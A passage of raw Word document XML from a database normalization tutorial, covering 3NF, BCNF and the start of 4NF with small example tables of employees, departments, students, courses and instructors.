            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E948D8D"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In this case, Department Name depends on Department ID, which is not part of the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34072B99"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3NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12204A1A"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mployee Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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25"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="1437"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="50023F42" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC77FCA"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Employee ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F7E5900"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Employee Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D292F24"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Department ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="299D4D24" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0141B640"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F95E9C"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AF6AB5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6816C503" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A51813"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62995B01"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304527DB"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C90F6BB"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epartment Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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7"/>
        <w:gridCol w:w="1783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5939345D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70563A53"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Department ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37086C8D"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Department Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="72C4879D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="029AB725"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0470B460"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="1C383E50" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78938078"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB4629F"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34BB40A8" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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6DC2A55">
          <v:rect id="_x0000_i2976" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC2C59"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4. Boyce-Codd Normal Form (BCNF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E1876"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A table is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BCNF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D67AB" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EEE41" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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For every non-trivial functional dependency A -&gt; B, A must be a superkey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476F300"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Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminate situations where a non-prime attribute (not part of the primary key) depends on another non-prime attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12553A78"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-BCNF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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4"/>
        <w:gridCol w:w="937"/>
        <w:gridCol w:w="1570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6496A79F" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB0BD9F"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Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1967672A"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Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EED670A"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Instructor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="1433966D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A9796C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA3E4F9"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C93FBE7"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Mr. Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2AE01AA4" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1E8E58"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21478908"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5060C12F"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Mr. Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6F938460" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726AD500"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="077A4F86"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A497828"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Mr. Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="094A3BCF"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Here, Instructor Name depends on Course ID, which is not a superkey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE51B15"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BCNF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CFF40"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Student-Course Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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4"/>
        <w:gridCol w:w="952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="447FCBBA" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE8EF3A"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Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="022E47A9"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Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6C7054C6" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B7744A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19F523EF"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0089D0CA" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C711EAD"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AB2984F"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="22C9517C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421B90CD"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="368EE3E3"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2047C99B"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Course-Instructor Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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2"/>
        <w:gridCol w:w="1570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="56BA6DA2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0E04B0"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Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD6DBC9"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Instructor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="09F41BEF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490CC1DC"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0975DEE1"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Mr. Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="515A56AB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E04A28"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B89D26C"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Mr. Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11BBCB5F" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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750D785">
          <v:rect id="_x0000_i2977" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75A88B"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5. Fourth Normal Form (4NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFBCB3"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A table is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548727EC" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BCNF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60135D2D" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It has no multi-valued dependencies, meaning that a record does not contain two or more independent, multivalued facts about an entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA7C62"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Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminate multi-valued dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2B129"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lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-4NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (multi-valued dependency exis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4"/>
        <w:gridCol w:w="937"/>
        <w:gridCol w:w="804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0A580D7C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114371E0"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Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63745B24"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Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01D959D6"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Hobby</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="71AC14BF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F09FE00"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D62406C"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4E58A8"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Football</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="55B65D77" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
